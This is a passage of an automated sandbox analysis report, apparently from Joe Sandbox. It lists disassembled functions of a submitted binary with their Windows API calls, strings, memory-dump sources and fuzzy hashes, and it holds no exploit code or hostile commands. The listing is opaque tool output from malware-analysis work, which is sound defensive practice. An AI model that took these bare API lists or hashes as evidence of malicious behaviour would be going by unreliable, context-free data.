                                                                                                                                                                  • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                                                                  Function 004505F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                                                                  • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                                                  • String ID: -----$SysListView32
                                                                                                                                                                  • API String ID: 2326795674-3975388722
                                                                                                                                                                  • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                  • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                                                  • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                                                                  Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                                                  • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                  • String ID: 0$2
                                                                                                                                                                  • API String ID: 93392585-3793063076
                                                                                                                                                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                                                  Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                                                                  • String ID: crts
                                                                                                                                                                  • API String ID: 586820018-3724388283
                                                                                                                                                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                                                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                                                                  Function 00433493 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cleanup$Startupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                                  • API String ID: 1500336939-3771769585
                                                                                                                                                                  • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                                                                                                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                                                                  • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                                                                  Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                                                  • SendMessageW.USER32(75A705F0,00001001,00000000,?), ref: 00448E16
                                                                                                                                                                  • SendMessageW.USER32(75A705F0,00001026,00000000,?), ref: 00448E25
                                                                                                                                                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3771399671-0
                                                                                                                                                                  • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                                                                  • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                                                                                                                  • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                                                                  • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                                                                                                                  Function 00434EC4 Relevance: 12.1, APIs: 8, Instructions: 115memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00434EE8
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00434F3E
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00434F64
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00434F6D
                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00434FB6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                  • Opcode ID: fb16c795eb7b0f8d7e2448c335eae3e8f8c4c2f94b6693942d823ca4d2b0b474
                                                                                                                                                                  • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
                                                                                                                                                                  • Opcode Fuzzy Hash: fb16c795eb7b0f8d7e2448c335eae3e8f8c4c2f94b6693942d823ca4d2b0b474
                                                                                                                                                                  • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
                                                                                                                                                                  Function 004175D2 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004175EC
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004175F9
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00417606
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00417613
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00417620
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041763C
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(00000000), ref: 0041764C
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00417662
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DecrementInterlocked
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3448037634-0
                                                                                                                                                                  • Opcode ID: 2d90712be0f5ac005b3e143ee6e6a3ff062905945baf7aad3938d434ed8910c2
                                                                                                                                                                  • Instruction ID: a7806976ab87669462c8841b6c00aae0a755f449dc62de05c426b9540ffcc43f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d90712be0f5ac005b3e143ee6e6a3ff062905945baf7aad3938d434ed8910c2
                                                                                                                                                                  • Instruction Fuzzy Hash: FB113071B04615A7DB109B7DCC84B97B7BDAF44754F184417A508D7244DB78EC80CBB8
                                                                                                                                                                  Function 00417543 Relevance: 12.1, APIs: 8, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(004115F6), ref: 00417555
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(00006B48), ref: 00417562
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(61C8E856), ref: 0041756F
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(FF8BC359), ref: 0041757C
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(0286E856), ref: 00417589
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(0286E856), ref: 004175A5
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(50F0458D), ref: 004175B5
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(00006DCB), ref: 004175CB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IncrementInterlocked
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3508698243-0
                                                                                                                                                                  • Opcode ID: 135d360ea79174b1c941fff99ef5a2e76c5bdc67544c7251d2319710911153bb
                                                                                                                                                                  • Instruction ID: 2b54aa213fc303e87487d6d7f5f44cae7e3f65ddbbee17ff61441cf1ee9523fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 135d360ea79174b1c941fff99ef5a2e76c5bdc67544c7251d2319710911153bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D110C71B04215BBDB109B79CC84BABBBAEAF44344F084827A508D7640CB78E950CBB4
                                                                                                                                                                  Function 0045EA0F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 325timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                                                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                                                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                                                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                                                                  Strings
                                                                                                                                                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$InitTime$ClearCopySystem
                                                                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                                  • API String ID: 134932582-1568723262
                                                                                                                                                                  • Opcode ID: 753d5363978faa8ebc3d37d1b5a82c34792bd8fa385372e65661eea4c178c1f3
                                                                                                                                                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                                                                  • Opcode Fuzzy Hash: 753d5363978faa8ebc3d37d1b5a82c34792bd8fa385372e65661eea4c178c1f3
                                                                                                                                                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                                                                  Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                  • API String ID: 3207048006-625585964
                                                                                                                                                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                                                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                                                                  Function 0047679F Relevance: 10.8, APIs: 7, Instructions: 307COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c552620f87f23c7d9ba297ce941b2af7893112363b3afb805ddda95799893be9
                                                                                                                                                                  • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                                                                  • Opcode Fuzzy Hash: c552620f87f23c7d9ba297ce941b2af7893112363b3afb805ddda95799893be9
                                                                                                                                                                  • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                                                                  Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                                                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                                                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
